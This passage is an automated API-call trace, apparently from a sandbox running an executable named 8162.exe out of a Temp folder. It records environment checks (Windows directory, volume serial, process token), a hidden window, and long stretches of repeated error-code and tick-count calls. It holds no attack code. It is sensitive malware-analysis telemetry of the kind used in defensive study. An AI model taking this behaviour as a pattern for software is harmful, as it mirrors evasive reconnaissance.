¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÄõÕÜôþ\x18", lpUsedDefaultChar=0x0) returned 256 [0104.872] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x417bc8, nSize=0x104 | out: lpFilename="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe") returned 0x2d [0104.872] GetLastError () returned 0x0 [0104.872] SetLastError (dwErrCode=0x0) [0104.873] GetLastError () returned 0x0 [0104.874] SetLastError (dwErrCode=0x0) [0104.874] GetLastError () returned 0x0 [0104.874] SetLastError (dwErrCode=0x0) [0104.874] GetLastError () returned 0x0 [0104.874] SetLastError (dwErrCode=0x0) [0104.874] GetLastError () returned 0x0 [0104.874] SetLastError (dwErrCode=0x0) [0104.874] GetLastError () returned 0x0 [0104.875] SetLastError (dwErrCode=0x0) [0104.875] GetLastError () returned 0x0 [0104.875] SetLastError (dwErrCode=0x0) [0104.875] GetLastError () returned 0x0 [0104.875] SetLastError (dwErrCode=0x0) [0104.875] GetLastError () returned 0x0 [0104.875] SetLastError (dwErrCode=0x0) [0104.875] GetLastError () returned 0x0 [0104.875] SetLastError (dwErrCode=0x0) [0104.875] GetLastError () returned 0x0 [0104.876] SetLastError (dwErrCode=0x0) [0104.876] GetLastError () returned 0x0 [0104.876] SetLastError (dwErrCode=0x0) [0104.876] GetLastError () returned 0x0 [0104.876] SetLastError (dwErrCode=0x0) [0104.876] GetLastError () returned 0x0 [0104.876] SetLastError (dwErrCode=0x0) [0104.876] GetLastError () returned 0x0 [0104.876] SetLastError (dwErrCode=0x0) [0104.876] GetLastError () returned 0x0 [0104.876] SetLastError (dwErrCode=0x0) [0104.877] GetLastError () returned 0x0 [0104.877] SetLastError (dwErrCode=0x0) [0104.877] GetLastError () returned 0x0 [0104.877] SetLastError (dwErrCode=0x0) [0104.877] GetLastError () returned 0x0 [0104.877] SetLastError (dwErrCode=0x0) [0104.878] GetLastError () returned 0x0 [0104.878] SetLastError (dwErrCode=0x0) [0104.878] GetLastError () returned 0x0 [0104.878] SetLastError (dwErrCode=0x0) [0104.878] GetLastError () returned 0x0 [0104.878] SetLastError (dwErrCode=0x0) [0104.878] GetLastError () returned 0x0 [0104.878] SetLastError (dwErrCode=0x0) [0104.878] GetLastError () returned 0x0 [0104.878] SetLastError (dwErrCode=0x0) [0104.878] GetLastError () returned 0x0 [0104.879] SetLastError (dwErrCode=0x0) [0104.879] GetLastError () returned 0x0 [0104.879] SetLastError (dwErrCode=0x0) [0104.879] GetLastError () returned 0x0 [0104.879] SetLastError (dwErrCode=0x0) [0104.879] GetLastError () returned 0x0 [0104.879] SetLastError (dwErrCode=0x0) [0104.879] GetLastError () returned 0x0 [0104.879] SetLastError (dwErrCode=0x0) [0104.879] GetLastError () returned 0x0 [0104.880] SetLastError (dwErrCode=0x0) [0104.880] GetLastError () returned 0x0 [0104.880] SetLastError (dwErrCode=0x0) [0104.880] GetLastError () returned 0x0 [0104.880] SetLastError (dwErrCode=0x0) [0104.880] GetLastError () returned 0x0 [0104.880] SetLastError (dwErrCode=0x0) [0104.880] GetLastError () returned 0x0 [0104.880] SetLastError (dwErrCode=0x0) [0104.880] GetLastError () returned 0x0 [0104.880] SetLastError (dwErrCode=0x0) [0104.881] GetLastError () returned 0x0 [0104.881] SetLastError (dwErrCode=0x0) [0104.881] GetLastError () returned 0x0 [0104.881] SetLastError (dwErrCode=0x0) [0104.881] GetLastError () returned 0x0 [0104.881] SetLastError (dwErrCode=0x0) [0104.881] GetLastError () returned 0x0 [0104.881] SetLastError (dwErrCode=0x0) [0104.881] GetLastError () returned 0x0 [0104.881] SetLastError (dwErrCode=0x0) [0104.881] GetLastError () returned 0x0 [0104.882] SetLastError (dwErrCode=0x0) [0104.882] GetLastError () returned 0x0 [0104.882] SetLastError (dwErrCode=0x0) [0104.882] GetLastError () returned 0x0 [0104.882] SetLastError (dwErrCode=0x0) [0104.882] GetLastError () returned 0x0 [0104.882] SetLastError (dwErrCode=0x0) [0104.882] GetLastError () returned 0x0 [0104.882] SetLastError (dwErrCode=0x0) [0104.882] GetLastError () returned 0x0 [0104.883] SetLastError (dwErrCode=0x0) [0104.883] GetLastError () returned 0x0 [0104.883] SetLastError (dwErrCode=0x0) [0104.883] GetLastError () returned 0x0 [0104.883] SetLastError (dwErrCode=0x0) [0104.883] GetLastError () returned 0x0 [0104.883] SetLastError (dwErrCode=0x0) [0104.883] GetLastError () returned 0x0 [0104.883] SetLastError (dwErrCode=0x0) [0104.884] GetLastError () returned 0x0 [0104.884] SetLastError (dwErrCode=0x0) [0104.884] GetLastError () returned 0x0 [0104.884] SetLastError (dwErrCode=0x0) [0104.884] GetLastError () returned 0x0 [0104.884] SetLastError (dwErrCode=0x0) [0104.884] GetLastError () returned 0x0 [0104.884] SetLastError (dwErrCode=0x0) [0104.884] GetLastError () returned 0x0 [0104.884] SetLastError (dwErrCode=0x0) [0104.885] GetLastError () returned 0x0 [0104.885] SetLastError (dwErrCode=0x0) [0104.885] GetLastError () returned 0x0 [0104.885] SetLastError (dwErrCode=0x0) [0104.885] GetLastError () returned 0x0 [0104.885] SetLastError (dwErrCode=0x0) [0104.885] GetLastError () returned 0x0 [0104.885] SetLastError (dwErrCode=0x0) [0104.885] GetLastError () returned 0x0 [0104.885] SetLastError (dwErrCode=0x0) [0104.886] GetLastError () returned 0x0 [0104.886] SetLastError (dwErrCode=0x0) [0104.886] GetLastError () returned 0x0 [0104.889] SetLastError (dwErrCode=0x0) [0104.889] GetLastError () returned 0x0 [0104.889] SetLastError (dwErrCode=0x0) [0104.889] GetLastError () returned 0x0 [0104.889] SetLastError (dwErrCode=0x0) [0104.889] GetLastError () returned 0x0 [0104.890] SetLastError (dwErrCode=0x0) [0104.890] GetLastError () returned 0x0 [0104.890] SetLastError (dwErrCode=0x0) [0104.890] GetLastError () returned 0x0 [0104.890] SetLastError (dwErrCode=0x0) [0104.890] GetLastError () returned 0x0 [0104.890] SetLastError (dwErrCode=0x0) [0104.890] GetLastError () returned 0x0 [0104.890] SetLastError (dwErrCode=0x0) [0104.891] GetLastError () returned 0x0 [0104.891] SetLastError (dwErrCode=0x0) [0104.891] GetLastError () returned 0x0 [0104.891] SetLastError (dwErrCode=0x0) [0104.891] GetLastError () returned 0x0 [0104.891] SetLastError (dwErrCode=0x0) [0104.891] GetLastError () returned 0x0 [0104.891] SetLastError (dwErrCode=0x0) [0104.891] GetLastError () returned 0x0 [0104.891] SetLastError (dwErrCode=0x0) [0104.892] GetLastError () returned 0x0 [0104.892] SetLastError (dwErrCode=0x0) [0104.892] GetLastError () returned 0x0 [0104.892] SetLastError (dwErrCode=0x0) [0104.892] GetLastError () returned 0x0 [0104.892] SetLastError (dwErrCode=0x0) [0104.892] GetLastError () returned 0x0 [0104.892] SetLastError (dwErrCode=0x0) [0104.893] GetLastError () returned 0x0 [0104.893] SetLastError (dwErrCode=0x0) [0104.893] GetLastError () returned 0x0 [0104.893] SetLastError (dwErrCode=0x0) [0104.893] GetLastError () returned 0x0 [0104.894] SetLastError (dwErrCode=0x0) [0104.894] GetLastError () returned 0x0 [0104.894] SetLastError (dwErrCode=0x0) [0104.894] GetLastError () returned 0x0 [0104.894] SetLastError (dwErrCode=0x0) [0104.894] GetLastError () returned 0x0 [0104.894] SetLastError (dwErrCode=0x0) [0104.894] GetLastError () returned 0x0 [0104.894] SetLastError (dwErrCode=0x0) [0104.894] GetLastError () returned 0x0 [0104.895] SetLastError (dwErrCode=0x0) [0104.895] GetLastError () returned 0x0 [0104.895] SetLastError (dwErrCode=0x0) [0104.895] GetLastError () returned 0x0 [0104.895] SetLastError (dwErrCode=0x0) [0104.895] GetLastError () returned 0x0 [0104.895] SetLastError (dwErrCode=0x0) [0104.895] GetLastError () returned 0x0 [0104.895] SetLastError (dwErrCode=0x0) [0104.895] GetLastError () returned 0x0 [0104.896] SetLastError (dwErrCode=0x0) [0104.896] GetLastError () returned 0x0 [0104.896] SetLastError (dwErrCode=0x0) [0104.898] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0104.898] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x405d24) returned 0x0 [0104.898] GetLastError () returned 0x0 [0104.898] SetLastError (dwErrCode=0x0) [0104.898] GetLastError () returned 0x0 [0104.898] SetLastError (dwErrCode=0x0) [0104.899] GetLastError () returned 0x0 [0104.899] SetLastError (dwErrCode=0x0) [0104.899] GetLastError () returned 0x0 [0104.899] SetLastError (dwErrCode=0x0) [0104.899] GetLastError () returned 0x0 [0104.899] SetLastError (dwErrCode=0x0) [0104.899] GetLastError () returned 0x0 [0104.899] SetLastError (dwErrCode=0x0) [0104.899] GetLastError () returned 0x0 [0104.899] SetLastError (dwErrCode=0x0) [0104.900] GetLastError () returned 0x0 [0104.900] SetLastError (dwErrCode=0x0) [0104.900] GetLastError () returned 0x0 [0104.900] SetLastError (dwErrCode=0x0) [0104.900] GetLastError () returned 0x0 [0104.900] SetLastError (dwErrCode=0x0) [0104.900] GetLastError () returned 0x0 [0104.900] SetLastError (dwErrCode=0x0) [0104.900] GetLastError () returned 0x0 [0104.900] SetLastError (dwErrCode=0x0) [0104.901] GetLastError () returned 0x0 [0104.901] SetLastError (dwErrCode=0x0) [0104.901] GetLastError () returned 0x0 [0104.901] SetLastError (dwErrCode=0x0) [0104.901] GetLastError () returned 0x0 [0104.901] SetLastError (dwErrCode=0x0) [0104.901] GetLastError () returned 0x0 [0104.901] SetLastError (dwErrCode=0x0) [0104.901] GetLastError () returned 0x0 [0104.901] SetLastError (dwErrCode=0x0) [0104.901] GetLastError () returned 0x0 [0104.902] SetLastError (dwErrCode=0x0) [0104.902] GetLastError () returned 0x0 [0104.902] SetLastError (dwErrCode=0x0) [0104.902] GetLastError () returned 0x0 [0104.902] SetLastError (dwErrCode=0x0) [0104.902] GetLastError () returned 0x0 [0104.902] SetLastError (dwErrCode=0x0) [0104.902] GetLastError () returned 0x0 [0104.902] SetLastError (dwErrCode=0x0) [0104.902] GetLastError () returned 0x0 [0104.903] SetLastError (dwErrCode=0x0) [0104.903] GetLastError () returned 0x0 [0104.903] SetLastError (dwErrCode=0x0) [0104.903] GetLastError () returned 0x0 [0104.903] SetLastError (dwErrCode=0x0) [0104.903] GetLastError () returned 0x0 [0104.903] SetLastError (dwErrCode=0x0) [0104.903] GetLastError () returned 0x0 [0104.903] SetLastError (dwErrCode=0x0) [0104.903] GetLastError () returned 0x0 [0104.904] SetLastError (dwErrCode=0x0) [0104.904] GetLastError () returned 0x0 [0104.904] SetLastError (dwErrCode=0x0) [0104.904] GetLastError () returned 0x0 [0104.904] SetLastError (dwErrCode=0x0) [0104.904] GetLastError () returned 0x0 [0104.904] SetLastError (dwErrCode=0x0) [0104.904] GetLastError () returned 0x0 [0104.904] SetLastError (dwErrCode=0x0) [0104.904] GetLastError () returned 0x0 [0104.905] SetLastError (dwErrCode=0x0) [0104.905] GetLastError () returned 0x0 [0104.905] SetLastError (dwErrCode=0x0) [0104.905] GetLastError () returned 0x0 [0104.905] SetLastError (dwErrCode=0x0) [0104.905] GetLastError () returned 0x0 [0104.905] SetLastError (dwErrCode=0x0) [0104.905] GetLastError () returned 0x0 [0104.905] SetLastError (dwErrCode=0x0) [0104.905] GetLastError () returned 0x0 [0104.906] SetLastError (dwErrCode=0x0) [0104.906] GetLastError () returned 0x0 [0104.906] SetLastError (dwErrCode=0x0) [0104.906] GetLastError () returned 0x0 [0104.906] SetLastError (dwErrCode=0x0) [0104.906] GetLastError () returned 0x0 [0104.906] SetLastError (dwErrCode=0x0) [0104.906] GetLastError () returned 0x0 [0104.906] SetLastError (dwErrCode=0x0) [0104.906] GetLastError () returned 0x0 [0104.907] SetLastError (dwErrCode=0x0) [0104.907] GetLastError () returned 0x0 [0104.907] SetLastError (dwErrCode=0x0) [0104.907] GetLastError () returned 0x0 [0104.907] SetLastError (dwErrCode=0x0) [0104.907] GetLastError () returned 0x0 [0104.907] SetLastError (dwErrCode=0x0) [0104.907] GetLastError () returned 0x0 [0104.907] SetLastError (dwErrCode=0x0) [0104.908] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x773b0000 [0104.910] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x76360000 [0104.921] LoadLibraryW (lpLibFileName="user32.dll") returned 0x75c60000 [0104.921] GetWindowsDirectoryW (in: lpBuffer=0x18fbac, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0104.921] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x4185d8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x4185d8*=0x28e290c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0104.922] GetCurrentProcess () returned 0xffffffff [0104.923] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x18, TokenHandle=0x18fdb0 | out: TokenHandle=0x18fdb0*=0x90) returned 1 [0104.923] GetTokenInformation (in: TokenHandle=0x90, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18fdb4 | out: TokenInformation=0x0, ReturnLength=0x18fdb4) returned 0 [0104.923] GetLastError () returned 0x7a [0104.923] GetTokenInformation (in: TokenHandle=0x90, TokenInformationClass=0x1, TokenInformation=0x237170, TokenInformationLength=0x24, ReturnLength=0x18fdb4 | out: TokenInformation=0x237170, ReturnLength=0x18fdb4) returned 1 [0104.923] GetLengthSid (pSid=0x237178) returned 0x1c [0104.923] CloseHandle (hObject=0x90) returned 1 [0104.923] GetLastError () returned 0x0 [0104.924] SetLastError (dwErrCode=0x0) [0104.924] GetLastError () returned 0x0 [0104.924] SetLastError (dwErrCode=0x0) [0104.924] GetLastError () returned 0x0 [0104.924] SetLastError (dwErrCode=0x0) [0104.924] GetLastError () returned 0x0 [0104.925] SetLastError (dwErrCode=0x0) [0104.925] GetLastError () returned 0x0 [0104.925] SetLastError (dwErrCode=0x0) [0104.925] GetLastError () returned 0x0 [0104.925] SetLastError (dwErrCode=0x0) [0104.925] FindWindowW (lpClassName="CN8FBA8CC", lpWindowName="WN8FBA8CC") returned 0x0 [0104.925] RegisterClassW (lpWndClass=0x18fdd0) returned 0xc182 [0104.926] CreateWindowExW (dwExStyle=0x0, lpClassName="CN8FBA8CC", lpWindowName="WN8FBA8CC", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x30208 [0104.941] NtdllDefWindowProc_W () returned 0x0 [0104.941] NtdllDefWindowProc_W () returned 0x1 [0104.946] NtdllDefWindowProc_W () returned 0x0 [0104.951] SetTimer (hWnd=0x30208, nIDEvent=0x20193808, uElapse=0xc8, lpTimerFunc=0x0) returned 0x20193808 [0104.951] NtdllDefWindowProc_W () returned 0x0 [0104.952] GetMessageW (in: lpMsg=0x18fe0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18fe0c) returned 1 [0105.143] TranslateMessage (lpMsg=0x18fe0c) returned 0 [0105.143] DispatchMessageW (lpMsg=0x18fe0c) returned 0x0 [0105.143] GetTickCount () returned 0x202dd [0105.143] KillTimer (hWnd=0x30208, uIDEvent=0x20193808) returned 1 [0105.143] GetTickCount () returned 0x202dd [0105.143] SetTimer (hWnd=0x30208, nIDEvent=0x20193808, uElapse=0xc8, lpTimerFunc=0x0) returned 0x20193808 [0105.143] NtdllDefWindowProc_W () returned 0x0 [0105.143] GetMessageW (in: lpMsg=0x18fe0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18fe0c) returned 1 [0105.345] TranslateMessage (lpMsg=0x18fe0c) returned 0 [0105.345] DispatchMessageW (lpMsg=0x18fe0c) [0105.345] GetTickCount () returned 0x203a8 [0105.345] GetTickCount () returned 0x203a8 [0105.345] GetTickCount () returned 0x203a8 [0105.346] GetLastError () returned 0x0 [0105.346] GetTickCount () returned 0x203a8 [0105.346] GetLastError () returned 0x0 [0105.346] GetTickCount () returned 0x203a8 [0105.346] GetLastError () returned 0x0 [0105.346] GetTickCount () returned 0x203a8 [0105.346] GetLastError () returned 0x0 [0105.346] GetTickCount () returned 0x203a8 [0105.346] GetLastError () returned 0x0 [0105.346] GetTickCount () returned 0x203a8 [0105.346] GetLastError () returned 0x0 [0105.346] GetTickCount () returned 0x203a8 [0105.346] GetLastError () returned 0x0 [0105.346] GetTickCount () returned 0x203a8 [0105.346] GetLastError () returned 0x0 [0105.346] GetTickCount () returned 0x203a8 [0105.346] GetLastError () returned 0x0 [0105.346] GetTickCount () returned 0x203a8 [0105.346] GetLastError () returned 0x0 [0105.346] GetTickCount () returned 0x203a8 [0105.346] GetLastError () returned 0x0 [0105.347] GetTickCount () returned 0x203a8 [0105.347] GetLastError () returned 0x0 [0105.347] GetTickCount () returned 0x203a8 [0105.347] GetLastError () returned 0x0 [0105.347] GetTickCount () returned 0x203a8 [0105.347] GetLastError () returned 0x0 [0105.347] GetTickCount () returned 0x203a8 [0105.347] GetLastError () returned 0x0 [0105.347] GetTickCount () returned 0x203a8 [0105.347] GetLastError () returned 0x0 [0105.347] GetTickCount () returned 0x203a8 [0105.347] GetLastError () returned 0x0 [0105.347] GetTickCount () returned 0x203a8 [0105.348] GetLastError () returned 0x0 [0105.348] GetTickCount () returned 0x203a8 [0105.348] GetLastError () returned 0x0 [0105.348] GetTickCount () returned 0x203a8 [0105.348] GetLastError () returned 0x0 [0105.348] GetTickCount () returned 0x203a8 [0105.348] GetLastError () returned 0x0 [0105.348] GetTickCount () returned 0x203a8 [0105.348] GetLastError () returned 0x0 [0105.348] GetTickCount () returned 0x203a8 [0105.348] GetLastError () returned 0x0 [0105.348] GetTickCount () returned 0x203a8 [0105.349] GetLastError () returned 0x0 [0105.349] GetTickCount () returned 0x203a8 [0105.349] GetLastError () returned 0x0 [0105.349] GetTickCount () returned 0x203a8 [0105.349] GetLastError () returned 0x0 [0105.349] GetTickCount () returned 0x203a8 [0105.349] GetLastError () returned 0x0 [0105.349] GetTickCount () returned 0x203a8 [0105.349] GetLastError () returned 0x0 [0105.349] GetTickCount () returned 0x203a8 [0105.349] GetLastError () returned 0x0 [0105.349] GetTickCount () returned 0x203a8 [0105.350] GetLastError () returned 0x0 [0105.350] GetTickCount () returned 0x203a8 [0105.350] GetLastError () returned 0x0 [0105.350] GetTickCount () returned 0x203a8 [0105.350] GetLastError () returned 0x0 [0105.350] GetTickCount () returned 0x203a8 [0105.350] GetLastError () returned 0x0 [0105.350] GetTickCount () returned 0x203a8 [0105.350] GetLastError () returned 0x0 [0105.350] GetTickCount () returned 0x203a8 [0105.350] GetLastError () returned 0x0 [0105.350] GetTickCount () returned 0x203a8 [0105.351] GetLastError () returned 0x0 [0105.351] GetTickCount () returned 0x203a8 [0105.351] GetLastError () returned 0x0 [0105.351] GetTickCount () returned 0x203a8 [0105.351] GetLastError () returned 0x0 [0105.351] GetTickCount () returned 0x203a8 [0105.351] GetLastError () returned 0x0 [0105.351] GetTickCount () returned 0x203a8 [0105.351] GetLastError () returned 0x0 [0105.351] GetTickCount () returned 0x203a8 [0105.351] GetLastError () returned 0x0 [0105.351] GetTickCount () returned 0x203a8 [0105.352] GetLastError () returned 0x0 [0105.352] GetTickCount () returned 0x203a8 [0105.352] GetLastError () returned 0x0 [0105.352] GetTickCount () returned 0x203a8 [0105.352] GetLastError () returned 0x0 [0105.352] GetTickCount () returned 0x203a8 [0105.352] GetLastError () returned 0x0 [0105.352] GetTickCount () returned 0x203a8 [0105.352] GetLastError () returned 0x0 [0105.352] GetTickCount () returned 0x203a8 [0105.352] GetLastError () returned 0x0 [0105.352] GetTickCount () returned 0x203a8 [0105.353] GetLastError () returned 0x0 [0105.353] GetTickCount () returned 0x203a8 [0105.353] GetLastError () returned 0x0 [0105.353] GetTickCount () returned 0x203a8 [0105.353] GetLastError () returned 0x0 [0105.353] GetTickCount () returned 0x203a8 [0105.353] GetLastError () returned 0x0 [0105.353] GetTickCount () returned 0x203a8 [0105.353] GetLastError () returned 0x0 [0105.353] GetTickCount () returned 0x203a8 [0105.353] GetLastError () returned 0x0 [0105.353] GetTickCount () returned 0x203a8 [0105.354] GetLastError () returned 0x0 [0105.354] GetTickCount () returned 0x203a8 [0105.354] GetLastError () returned 0x0 [0105.354] GetTickCount () returned 0x203a8 [0105.354] GetLastError () returned 0x0 [0105.354] GetTickCount () returned 0x203a8 [0105.354] GetLastError () returned 0x0 [0105.354] GetTickCount () returned 0x203a8 [0105.354] GetLastError () returned 0x0 [0105.354] GetTickCount () returned 0x203a8 [0105.354] GetLastError () returned 0x0 [0105.354] GetTickCount () returned 0x203a8 [0105.355] GetLastError () returned 0x0 [0105.355] GetTickCount () returned 0x203a8 [0105.355] GetLastError () returned 0x0 [0105.355] GetTickCount () returned 0x203a8 [0105.355] GetLastError () returned 0x0 [0105.355] GetTickCount () returned 0x203a8 [0105.355] GetLastError () returned 0x0 [0105.355] GetTickCount () returned 0x203a8 [0105.358] GetLastError () returned 0x0 [0105.363] GetTickCount () returned 0x203b7 [0105.363] GetLastError () returned 0x0 [0105.363] GetTickCount () returned 0x203b7 [0105.363] GetLastError () returned 0x0 [0105.363] GetTickCount () returned 0x203b7 [0105.363] GetLastError () returned 0x0 [0105.363] GetTickCount () returned 0x203b7 [0105.363] GetLastError () returned 0x0 [0105.363] GetTickCount () returned 0x203b7 [0105.363] GetLastError () returned 0x0 [0105.363] GetTickCount () returned 0x203b7 [0105.364] GetLastError () returned 0x0 [0105.364] GetTickCount () returned 0x203b7 [0105.364] GetLastError () returned 0x0 [0105.364] GetTickCount () returned 0x203b7 [0105.364] GetLastError () returned 0x0 [0105.364] GetTickCount () returned 0x203b7 [0105.364] GetLastError () returned 0x0 [0105.364] GetTickCount () returned 0x203b7 [0105.364] GetLastError () returned 0x0 [0105.364] GetTickCount () returned 0x203b7 [0105.364] GetLastError () returned 0x0 [0105.364] GetTickCount () returned 0x203b7 [0105.365] GetLastError () returned 0x0 [0105.365] GetTickCount () returned 0x203b7 [0105.365] GetLastError () returned 0x0 [0105.365] GetTickCount () returned 0x203b7 [0105.365] GetLastError () returned 0x0 [0105.365] GetTickCount () returned 0x203b7 [0105.365] GetLastError () returned 0x0 [0105.365] GetTickCount () returned 0x203b7 [0105.365] GetLastError () returned 0x0 [0105.365] GetTickCount () returned 0x203b7 [0105.365] GetLastError () returned 0x0 [0105.365] GetTickCount () returned 0x203b7 [0105.366] GetLastError () returned 0x0 [0105.366] GetTickCount () returned 0x203b7 [0105.366] GetLastError () returned 0x0 [0105.366] GetTickCount () returned 0x203b7 [0105.366] GetLastError () returned 0x0 [0105.366] GetTickCount () returned 0x203b7 [0105.366] GetLastError () returned 0x0 [0105.366] GetTickCount () returned 0x203b7 [0105.366] GetLastError () returned 0x0 [0105.366] GetTickCount () returned 0x203b7 [0105.366] GetLastError () returned 0x0 [0105.366] GetTickCount () returned 0x203b7 [0105.367] GetLastError () returned 0x0 [0105.367] GetTickCount () returned 0x203b7 [0105.367] GetLastError () returned 0x0 [0105.367] GetTickCount () returned 0x203b7 [0105.367] GetLastError () returned 0x0 [0105.367] GetTickCount () returned 0x203b7 [0105.367] GetLastError () returned 0x0 [0105.367] GetTickCount () returned 0x203b7 [0105.367] GetLastError () returned 0x0 [0105.367] GetTickCount () returned 0x203b7 [0105.367] GetLastError () returned 0x0 [0105.367] GetTickCount () returned 0x203b7 [0105.368] GetLastError () returned 0x0 [0105.368] GetTickCount () returned 0x203b7 [0105.368] GetLastError () returned 0x0 [0105.368] GetTickCount () returned 0x203b7 [0105.368] GetLastError () returned 0x0 [0105.368] GetTickCount () returned 0x203b7 [0105.368] GetLastError () returned 0x0 [0105.368] GetTickCount () returned 0x203b7 [0105.368] GetLastError () returned 0x0 [0105.368] GetTickCount () returned 0x203b7 [0105.368] GetLastError () returned 0x0 [0105.368] GetTickCount () returned 0x203b7 [0105.369] GetLastError () returned 0x0 [0105.369] GetTickCount () returned 0x203b7 [0105.369] GetLastError () returned 0x0 [0105.369] GetTickCount () returned 0x203b7 [0105.369] GetLastError () returned 0x0 [0105.369] GetTickCount () returned 0x203b7 [0105.369] GetLastError () returned 0x0 [0105.369] GetTickCount () returned 0x203b7 [0105.369] GetLastError () returned 0x0 [0105.369] GetTickCount () returned 0x203b7 [0105.369] GetLastError () returned 0x0 [0105.369] GetTickCount () returned 0x203b7 [0105.369] GetLastError () returned 0x0 [0105.370] GetTickCount () returned 0x203b7 [0105.370] GetLastError () returned 0x0 [0105.370] GetTickCount () returned 0x203b7 [0105.370] GetLastError () returned 0x0 [0105.370] GetTickCount () returned 0x203b7 [0105.370] GetLastError () returned 0x0 [0105.370] GetTickCount () returned 0x203b7 [0105.370] GetLastError () returned 0x0 [0105.370] GetTickCount () returned 0x203b7 [0105.370] GetLastError () returned 0x0 [0105.370] GetTickCount () returned 0x203b7 [0105.370] GetLastError () returned 0x0 [0105.371] GetTickCount () returned 0x203b7 [0105.371] GetLastError () returned 0x0 [0105.371] GetTickCount () returned 0x203b7 [0105.371] GetLastError () returned 0x0 [0105.371] GetTickCount () returned 0x203b7 [0105.371] GetLastError () returned 0x0 [0105.371] GetTickCount () returned 0x203b7 [0105.371] GetLastError () returned 0x0 [0105.371] GetTickCount () returned 0x203b7 [0105.371] GetLastError () returned 0x0 [0105.371] GetTickCount () returned 0x203b7 [0105.371] GetLastError () returned 0x0 [0105.372] GetTickCount () returned 0x203b7 [0105.372] GetLastError () returned 0x0 [0105.372] GetTickCount () returned 0x203b7 [0105.372] GetLastError () returned 0x0 [0105.372] GetTickCount () returned 0x203b7 [0105.372] GetLastError () returned 0x0 [0105.372] GetTickCount () returned 0x203b7 [0105.372] GetLastError () returned 0x0 [0105.372] GetTickCount () returned 0x203b7 [0105.372] GetLastError () returned 0x0 [0105.372] GetTickCount () returned 0x203b7 [0105.372] GetLastError () returned 0x0 [0105.373] GetTickCount () returned 0x203b7 [0105.373] GetLastError () returned 0x0 [0105.373] GetTickCount () returned 0x203b7 [0105.373] GetLastError () returned 0x0 [0105.373] GetTickCount () returned 0x203b7 [0105.373] GetLastError () returned 0x0 [0105.373] GetTickCount () returned 0x203b7 [0105.373] GetLastError () returned 0x0 [0105.373] GetTickCount () returned 0x203b7 [0105.373] GetLastError () returned 0x0 [0105.373] GetTickCount () returned 0x203b7 [0105.373] GetLastError () returned 0x0 [0105.373] GetTickCount () returned 0x203b7 [0105.374] GetLastError () returned 0x0 [0105.374] GetTickCount () returned 0x203b7 [0105.374] GetLastError () returned 0x0 [0105.374] GetTickCount () returned 0x203b7 [0105.374] GetLastError () returned 0x0 [0105.374] GetTickCount () returned 0x203b7 [0105.374] GetLastError () returned 0x0 [0105.374] GetTickCount () returned 0x203b7 [0105.374] GetLastError () returned 0x0 [0105.374] GetTickCount () returned 0x203b7 [0105.374] GetLastError () returned 0x0 [0105.374] GetTickCount () returned 0x203b7 [0105.374] GetLastError () returned 0x0 [0105.375] GetTickCount () returned 0x203b7 [0105.375] GetLastError () returned 0x0 [0105.375] GetTickCount () returned 0x203b7 [0105.375] GetLastError () returned 0x0 [0105.375] GetTickCount () returned 0x203b7 [0105.375] GetLastError () returned 0x0 [0105.375] GetTickCount () returned 0x203b7 [0105.375] GetLastError () returned 0x0 [0105.375] GetTickCount () returned 0x203b7 [0105.375] GetLastError () returned 0x0 [0105.375] GetTickCount () returned 0x203b7 [0105.375] GetLastError () returned 0x0 [0105.375] 